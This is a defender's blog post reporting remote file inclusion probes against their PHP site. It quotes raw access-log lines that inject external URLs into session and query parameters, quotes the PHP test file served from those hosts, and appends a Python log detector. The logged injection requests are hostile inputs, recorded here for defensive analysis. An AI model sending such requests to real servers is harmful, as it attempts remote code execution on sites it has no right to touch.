Weird exploitation attempts

I just noticed some weird HTTP requests on my site. It seems that someone is trying to exploit a remote file inclusion vulnerability in some software. Normally I wouldn't blink an eye at these, but it seems that the vulnerability is in the PHPSESSID variable. I've got no idea which software these belong to, though. Here are some examples:

These are the requests the attacker made:

[code]
125.136.86.51 - - [29/Jan/2008:06:32:06 +0200] "GET / HTTP/1.1" 200 277 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:07 +0200] "GET /index.php HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:08 +0200] "GET /index.php?PHPSESSID=http%3A%2F%2Fwww.<removed>ilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F;www HTTP/1.1" 200 30633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:09 +0200] "GET /index.php?PHPSESSID=http%3A%2F%2Fwww.<removed>rvice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F;www HTTP/1.1" 200 30633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:10 +0200] "GET /wordpress HTTP/1.1" 301 408 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:11 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27;www HTTP/1.1" 200 30633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:12 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=http%3A%2F%2Fwww.<removed>ice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F;board=7.0 HTTP/1.1" 200 31103 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:13 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=http%3A%2F%2Fwww.<removed>ime.com.mx%2Fgaleria%2Finclude%2Fnokuc%2Fkef%2F;board=7.0 HTTP/1.1" 200 31103 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
83.150.86.76 - - [29/Jan/2008:06:32:13 +0200] "GET /wordpress/feed/ HTTP/1.1" 200 14714 "-" "-"
125.136.86.51 - - [29/Jan/2008:06:32:14 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=unread;board=http%3A%2F%2Fwww.<removed>nd.co.uk%2Fscans%2Fyouneedtoselectaplanettoclaimbeforegettinginhere%2Fscanlogs%2Fiwazex%2Fatepec%2F HTTP/1.1" 200 13467 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:15 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=unread;board=http%3A%2F%2Fwww.<removed>us.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F HTTP/1.1" 200 13467 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:16 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&board=http%3A%2F%2Fwww.<removed>ft.com%2Fforum%2FThemes%2Frowizah%2Fnisahuc%2F HTTP/1.1" 200 30633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:17 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&board=http%3A%2F%2Fwww.<removed>ft.co.uk%2Fforum%2Flovuqo%2Fzil%2F HTTP/1.1" 200 30633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:19 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&topic=http%3A%2F%2Fwww.<removed>nd.co.uk%2Fscans%2Fyouneedtoselectaplanettoclaimbeforegettinginhere%2Fscanlogs%2Fiwazex%2Fatepec%2F HTTP/1.1" 200 30633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:20 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&topic=http%3A%2F%2Fwww.<removed>ub.it%2Fconcerti%2Fdati%2Folukev%2Forawo%2F HTTP/1.1" 200 30633 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:21 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=profile;u=http%3A%2F%2Fwww.<removed>site.com%2Fsoeasycasino%2Fixu%2Fxotem%2F HTTP/1.1" 200 11551 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:22 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=profile;u=http%3A%2F%2Fwww.<removed>me.com.mx%2Fgaleria%2Finclude%2Fnokuc%2Fkef%2F HTTP/1.1" 200 11551 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:23 +0200] "GET /wordpress/ HTTP/1.1" 200 18360 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:24 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=unread;board=7.0 HTTP/1.1" 200 13642 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:25 +0200] "GET /wordpress/2007/03/ HTTP/1.1" 200 17954 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:26 +0200] "GET /wordpress/2007/02/20/the-saga-of-virut-continues/ HTTP/1.1" 200 5823 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
125.136.86.51 - - [29/Jan/2008:06:32:27 +0200] "GET /wordpress/2007/02/20/the-saga-of-virut-continues/feed/ HTTP/1.1" 200 557 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
[/code]

I removed parts of the domain names to prevent further exploitation of those sites. When visiting the URL we are greeted with a text file containing this:

[code]
<?php echo md5("just_a_test");?>
[/code]

I’ve got no idea how widespread this is, and no idea of the affected software.

[edit]

I'm starting to get more and more of these attempts from various IP addresses that all seem to be web servers. I checked a few manually. They had no common software installed, but rather all the telltale signs of remote file inclusion written all over the site.
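As an added example (not part of the original post), here is a small Python detector that reads Apache combined-format log lines like the ones above, splits the query string on both `&` and `;` the way the probed requests are formed, and reports every parameter whose decoded value is a remote URL, whichever parameter it sits in (PHPSESSID, action, board, topic or u). The sample lines and source addresses are constructed, the remote hosts are replaced by example.invalid, and it also flags https and ftp URLs, which goes beyond the http-only probes shown here.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log line; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines modelled on the post's excerpt (not the original log):
# documentation source addresses, remote hosts replaced by example.invalid.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jan/2008:06:32:08 +0200] "GET /index.php?PHPSESSID=http%3A%2F%2Fexample.invalid%2Fimages%2Fuza%2F;www HTTP/1.1" 200 30633 "-" "Mozilla/4.0"
203.0.113.7 - - [29/Jan/2008:06:32:12 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=http%3A%2F%2Fexample.invalid%2Finclude%2F;board=7.0 HTTP/1.1" 200 31103 "-" "Mozilla/4.0"
203.0.113.7 - - [29/Jan/2008:06:32:24 +0200] "GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=unread;board=7.0 HTTP/1.1" 200 13642 "-" "Mozilla/4.0"
198.51.100.9 - - [29/Jan/2008:06:32:13 +0200] "GET /wordpress/feed/ HTTP/1.1" 200 14714 "-" "-"
"""

REMOTE_SCHEMES = ("http", "https", "ftp")


def query_params(target):
    """Split the query string into decoded (name, value) pairs.

    Both '&' and ';' separate parameters, because the probed requests use ';'
    (e.g. 'action=unread;board=7.0'); each part is percent-decoded once.
    """
    pairs = []
    for chunk in re.split(r"[&;]", urlsplit(target).query):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def is_remote_url(value):
    """True when a decoded value is an absolute URL PHP could fetch over the network."""
    return "://" in value and urlsplit(value).scheme.lower() in REMOTE_SCHEMES


def find_rfi_probes(log_text):
    """Return (source_ip, status, parameter, injected_url) for every remote-URL value."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in query_params(m["target"]):
            if is_remote_url(value):
                findings.append((m["ip"], int(m["status"]), name, value))
    return findings
```

A 200 status on a flagged request only means the page rendered, not that the include happened; check whether the response size differs from a normal request with the same parameters, as it does in the log above.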
